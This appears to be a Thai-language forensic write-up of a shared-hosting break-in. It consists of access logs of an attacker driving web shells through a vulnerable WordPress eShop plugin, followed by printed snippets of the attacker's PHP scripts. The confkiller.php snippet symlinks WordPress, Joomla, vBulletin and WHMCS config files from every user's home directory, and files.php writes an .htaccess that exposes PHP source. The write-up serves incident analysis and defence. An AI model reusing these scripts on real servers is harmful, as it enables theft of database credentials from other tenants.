180.244.249.92 - - [28/May/2013:14:54:25 +0700] "GET /files.php?sws=passwd HTTP/1.1" 200 5520
**************
180.244.249.92 - - [28/May/2013:14:54:26 +0700] "POST /files.php?sws=passwd&save=1 HTTP/1.1" 200 21005
**************
180.244.249.92 - - [28/May/2013:14:54:29 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:34 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=joomla HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=wp HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=vb HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:41 +0700] "GET /files.php? HTTP/1.1" 200 2832
เป็นอันเรียบร้อย หน้าหลักโฮมเพจ
### –> [5] START: ATTACK UNSUCCESSFUL ###
พยายามเจาะเข้าไปยังโดเมนที่เหลือต่อ
**************
180.244.249.92 - - [28/May/2013:14:54:48 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880
**************
180.244.249.92 - - [28/May/2013:14:54:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/ HTTP/1.1" 200 30970
180.244.249.92 - - [28/May/2013:14:55:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:55:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14128
180.244.249.92 - - [28/May/2013:14:55:57 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14155
180.244.249.92 - - [28/May/2013:14:56:04 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:56:15 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:56:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:56:55 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/ HTTP/1.1" 200 17516
180.244.249.92 - - [28/May/2013:14:57:16 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/ HTTP/1.1" 200 28180
180.244.249.92 - - [28/May/2013:14:57:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/ HTTP/1.1" 200 146442
180.244.249.92 - - [28/May/2013:14:57:31 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13852
180.244.249.92 - - [28/May/2013:14:57:37 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13879
180.244.249.92 - - [28/May/2013:14:57:45 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:57:47 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-D/ HTTP/1.1" 200 47166
### –> END: ATTACK UNSUCCESSFUL ###
ไม่สำเร็จ นอนดีกว่า :- 
ตัวอย่าง ไฟล์สคริปต์ files.php
@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);
@symlink("/","sym/root");
$pg = basename(__FILE__);
 ////////// WordPress ////////////
$pos = strpos($wp, "200");
$config=" ";
if (strpos($wp, "200") == true )
{
 $config="Wordpress";
}
elseif (strpos($wp12, "200") == true)
{
  $config="Wordpress";
}
ตัวอย่าง ไฟล์สคริปต์ confkiller.php
    error_reporting(0);
    echo "";
    if(isset($_POST['su']))
    {
    mkdir('Indishell',0777);
$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
$indishell = symlink("/","Indishell/root");
            $rt=" OwN3d";
        echo "Bhai ji .... check link given below for / folder symlink
$rt";
        $dir=mkdir('INDISHELL',0777);
        $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
        $f = fopen('INDISHELL/.htaccess','w');
        fwrite($f,$r);
        $consym="configuration files";
        echo "
The link given below for configuration file symlink...open it, once processing finish
$consym";
            $usr=explode("\n",$_POST['user']);
        $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
        foreach($usr as $uss )
        {
            $us=trim($uss);
            foreach($configuration as $c)
            {
             $rs="/home/".$us."/public_html/".$c;
             $r="INDISHELL/".$us." .. ".$c;
             symlink($rs,$r);
        }
            }
        }
    ?>
ตัวอย่าง ไฟล์สคริปต์ idca.php

    
root@IDCA:~#
    
    
    



สรุป คือแฮกเกอร์พยายามเจาะเข้าระบบทุกโดเมนบนเว็บโฮตส์ติ้ง แต่แฮกได้เฉพาะผู้ที่ใช้ eShop WordPress Plugin แล้วทำการเปลี่ยนแปลงข้อมูลหน้าโฮมเพจ
และทำลิงก์แสดงข้อมูลไดร์เรกทอรีของระบบ การตรวจสอบเบื้องต้นไม่พบว่ามีข้อมูลสำคัญหลุดออกไป ช่องโหว่เกิดจากเครื่องมือ eShop และแฮกเกอร์ไม่ได้ใช้ทางช่องโหว่ของ WordPress (แต่ผู้ต้องอัพเดท WordPress ไปเป็นเวอร์ชั่นล่าสุด)